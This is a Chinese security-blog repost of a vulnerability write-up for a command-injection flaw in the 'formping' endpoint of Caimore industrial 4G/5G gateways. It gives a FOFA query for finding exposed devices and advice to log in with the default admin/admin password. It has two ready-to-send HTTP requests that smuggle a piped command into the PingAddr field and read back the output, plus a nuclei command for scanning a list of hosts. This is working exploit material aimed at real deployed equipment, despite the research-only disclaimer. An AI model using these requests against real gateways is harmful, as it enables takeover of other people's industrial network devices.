才茂通信 网关 formping 远程命令执行漏洞

admin 2024年10月13日18:22:28评论48 views字数 880阅读2分56秒阅读模式

0x01 漏洞描述

厦门才茂网关,采用开放式软件架构设计,是一款金属外壳设计,带4路千兆LAN、1路千兆WAN,采用 3G/4G/5G 广域网络上网通信的工业级设计无线网关,支持2.4GWiFi和5.8GWiFi。厦门才茂网关系统formping存在命令执行漏洞,攻击者通过漏洞可以执行任意命令,导致服务器失陷。才茂通信 网关 formping 远程命令执行漏洞

0x02 漏洞复现

fofaapp="CAIMORE-Gateway"

1.弱口令admin-admin登录,通过漏洞执行ls命令,得到回显

POC1:POST /goform/formping HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36Connection: closeContent-Length: 63Authorization: Basic YWRtaW46YWRtaW4=Accept-Encoding: gzipPingAddr=127.0.0.1%7Cecho%20hellocaimao&PingPackNumb=1&PingMsg=POC2:GET /pingmessages HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36Connection: closeAuthorization: Basic YWRtaW46YWRtaW4=Accept-Encoding: gzip

才茂通信 网关 formping 远程命令执行漏洞

才茂通信 网关 formping 远程命令执行漏洞

2.nuclei验证脚本已发表于知识星球

nuclei.exe -t caimao-gateway-formping-rce.yaml -l subs.txt -stats

才茂通信 网关 formping 远程命令执行漏洞

 

原文始发于微信公众号(阿乐你好):漏洞复现 才茂通信 网关 formping 远程命令执行漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月13日18:22:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   才茂通信 网关 formping 远程命令执行漏洞https://cn-sec.com/archives/1896307.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息